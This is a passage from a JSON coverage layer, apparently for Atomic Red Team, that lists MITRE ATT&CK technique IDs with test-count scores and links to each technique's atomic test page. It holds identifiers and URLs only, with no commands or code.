Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":51,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":67,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":34,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":29,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1115","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}]},{"techniqueID":"T1127.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":9,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.001/T1137.001.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":78,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":14,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222.002","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1485","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View 